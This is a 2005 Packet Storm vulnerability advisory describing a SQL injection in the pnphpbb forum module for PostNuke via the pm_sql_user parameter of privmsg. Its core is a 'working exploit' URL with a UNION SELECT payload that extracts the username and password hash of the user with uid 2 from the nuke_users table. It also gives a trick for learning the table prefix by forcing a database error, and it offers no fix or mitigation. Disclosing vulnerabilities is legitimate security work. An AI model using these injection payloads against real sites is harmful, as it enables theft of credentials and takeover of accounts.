mixedSQL.txt

2005-03-02T00:00:00
ID PACKETSTORM:36402
Type packetstorm
Reporter Jocanor
Modified 2005-03-02T00:00:00

Description

                                        
                                            `  
  
  
[Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor]  
  
Author: Jocanor  
Date: 01-03-2k5  
  
  
1. -----------introduction--------.  
  
Postnuke is an open source CMS (content management system), originally based in php-nuke. (www.postnuke.com)  
  
pnphpbb is a module for postnuke based in popular forum system phpbb. (www.phpbb.com)  
  
2. ------------the bug------------  
  
in 26 -03-04 janek vind discovers a bug in phpbb forums, in prvmsg.php file described in the bugtraq id 9984 and the bug affects also to php-nuke; butraq privades exploits for exploit this bug in php-nuke and phpbb.  
  
But the module Pnphpbb (postnuke phpbb) is also vulnerable to this issue, and its easy to exploit:  
  
http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20[sql here]  
  
3 -------- the exploit ----------  
  
Working exploit:  
  
http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass,pn_pass,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20nuke_users%20where%20pn_uid=2/*  
  
Show password hash for the user with uid = 2.  
  
4. ------important notes-----  
  
Note: if don't works, changue the prefix nuke_ for the valid prefix, you can get the valid table prefix causing an error like this:  
  
http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20'  
  
  
5----- Contact -----  
  
Author: Jocanor   
Location: Spain  
Email: jocanor [at] gmail [dot] com  
  
JoCaNoR SeCuRiTy ReaSoNS  
  
EOF.  
`